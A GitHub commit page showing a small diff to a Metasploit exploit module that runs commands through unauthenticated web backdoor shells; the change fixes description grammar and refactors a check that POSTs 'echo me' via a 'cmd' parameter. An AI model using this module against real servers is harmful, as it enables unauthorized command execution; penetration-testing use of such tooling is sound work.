Skip to content

Commit

Permalink
Update simple_backdoors_exec.rb
Browse files Browse the repository at this point in the history
  • Loading branch information
shipcod3 committed Sep 8, 2015
1 parent 37c28dd commit 467f9a8
Showing 1 changed file with 8 additions and 9 deletions.
17 changes: 8 additions & 9 deletions modules/exploits/multi/http/simple_backdoors_exec.rb
Expand Up @@ -15,9 +15,9 @@ def initialize(info={})
'Name' => 'Simple Backdoor Shell Remote Code Execution',
'Description' => %q{
This module exploits unauthenticated simple web backdoor shells by leveraging the
common backdoor shells' CMD parameter to execute commands. The SecLists project of
Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
which are categorized under Payloads.
common backdoor shell's CMD parameter to execute commands. The SecLists project of
Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
which is categorized under Payloads.
},
'License' => MSF_LICENSE,
'Author' =>
Expand Down Expand Up @@ -58,15 +58,14 @@ def initialize(info={})

def check
test = "echo me"
request_parameters = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s),
'vars_post' =>
shell = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s),
'vars_post' =>
{
'cmd' => test
}
}
shell = send_request_cgi(request_parameters)
})
if (shell and shell.body =~ /echo me/)
return Exploit::CheckCode::Vulnerable
end
Expand Down

0 comments on commit 467f9a8

Please sign in to comment.